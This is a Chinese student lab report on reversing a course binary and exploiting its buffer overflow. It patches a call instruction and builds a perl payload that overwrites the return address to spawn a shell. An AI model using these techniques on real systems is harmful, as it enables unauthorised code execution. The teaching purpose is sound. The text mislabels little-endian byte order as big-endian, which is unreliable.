20145320《网络对抗》逆向及Bof基础实践
1 逆向及Bof基础实践说明
1.1 实践目标
本次实践的对象是一个名为pwn20145320的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。
使用两种方法:
1.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
2.手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
这几种思路,基本代表现实情况中的攻击目标
- (1)运行原本不可访问的代码片段
- (2)强行修改程序执行流
- (3)以及注入运行任意代码。
1.2 基础知识
1 直接修改程序机器指令,改变程序执行流程
对目标文件pwn20145320进行反汇编。下面只保留了最核心的几行代码。
root@KaliYL:~# objdump -d pwn20145320 | more
0804847d <getShell>:
804847d: 55 push %ebp
...
08048491 <foo>:
8048491: 55 push %ebp
...
080484af <main>:
...
80484b5: e8 d7 ff ff ff call 8048491 <foo>
80484ba: b8 00 00 00 00 mov $0x0,%eax
...
先看第12行,"call 8048491 "是汇编指令,是说这条指令将调用位于地址8048491处的foo函数;其对应机器指令为“e8 d7ffffff”,e8即跳转之意。本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但一解释e8这条指令呢,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值,
main函数调用foo,对应机器指令为“ e8 d7ffffff”,那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。
下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。
root@KaliYL:~# vi pwn20145320
以下操作是在vi内
1.按ESC键
2.输入如下,将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8d7
4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
5.修改d7为c3
6.转换16进制为原格式
:%!xxd -r
7.存盘退出vi
:wq
8.再反汇编看一下,call指令是否正确调用getShell
root@KaliYL:~# objdump -d pwn20145320 | more
...
080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 c3 ff ff ff call 804847d <getShell>
80484ba: b8 00 00 00 00 mov $0x0,%eax
2 通过构造输入参数,造成BOF攻击,改变程序执行流
发现该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞
08048491 <foo>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 38 sub $0x38,%esp
8048497: 8d 45 e4 lea -0x1c(%ebp),%eax
804849a: 89 04 24 mov %eax,(%esp)
== 这里读入字符串,但系统只预留了?字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址 ==
080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 d7 ff ff ff call 8048491 <foo>
上面的call调用foo,同时在堆栈上压上返回地址值:80484ba
3 确认输入字符串哪几个字符会覆盖到返回地址
为了确定使用多少个字节才会使缓冲区溢出,这里使用暴力破解法,及一个一个字符添加直到出现Segmentation fault
字样。
这里可以回答上面的问题是27字节!!
但是我们的目标是将寄存器%eip的值给覆盖掉,并非单纯地找到溢出长度!!
这里使用GDB调试:
root@KaliYL:~# gdb pwn20145320
(gdb) r
Starting program: /root/pwn20145320
1111111122222222333333334444444455555555
1111111122222222333333334444444455555555
Program received signal SIGSEGV, Segmentation fault.
同时查看每个寄存器的值,查看的关键是寄存器eip的值!
(gdb) info r
...
eip 0x35353535 0x35353535 //注意EIP的值,是ASCII 5
...
再次调试查看是哪个字符被覆盖到了eip中:
Start it from the beginning? (y or n) y
Starting program: /root/pwn20145320
1111111122222222333333334444444412345678
1111111122222222333333334444444412345678
Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ()
(gdb) info r
eip 0x34333231 0x34333231
eflags 0x10246 [ PF ZF IF RF ]
仔细观察发现其实图上已经在询问eip的值是什么!
如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn20145320,pwn20145320就会运行getShell。
4 确认用什么值来覆盖返回地址
getShell的内存地址是0804847d。
接下来要确认下字节序(这里是低字节放在高位的大端法),简单说是输入11111111222222223333333344444444\x7d\x84\x04\x08。(前面32字节可以任意输入)
5 构造输入字符串
由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
root@KaliYL:~# perl -e 'print "12345678123456781234567812345678\x7d\x84\x04\x08\x0a"' > input
可以使用16进制查看指令xxd查看input文件的内容是否如预期。
root@KaliYL:~# xxd input
00000000: 3132 3334 3536 3738 3132 3334 3536 3738 1234567812345678
00000010: 3132 3334 3536 3738 3132 3334 3536 3738 1234567812345678
00000020: 7d84 0408 0a }....
然后将input的输入,通过管道符“|”,作为pwn20145320的输入。
root@KaliYL:~# (cat input; cat) | ./pwn20145320
实验思考与反思
-
1、第一个实验是修改call函数调用的函数地址来调用同一文件中的另一个函数。但是万一这个可执行文件里面只有一个函数,并没有其他函数怎么办,只能自己注入代码!而且我感觉自己注入代码的情况会更多!
-
2、在缓冲区溢出攻击中除了使用暴力破解来找缓冲区的大小,假如有可以计算的方法可能会减少很大的工作量。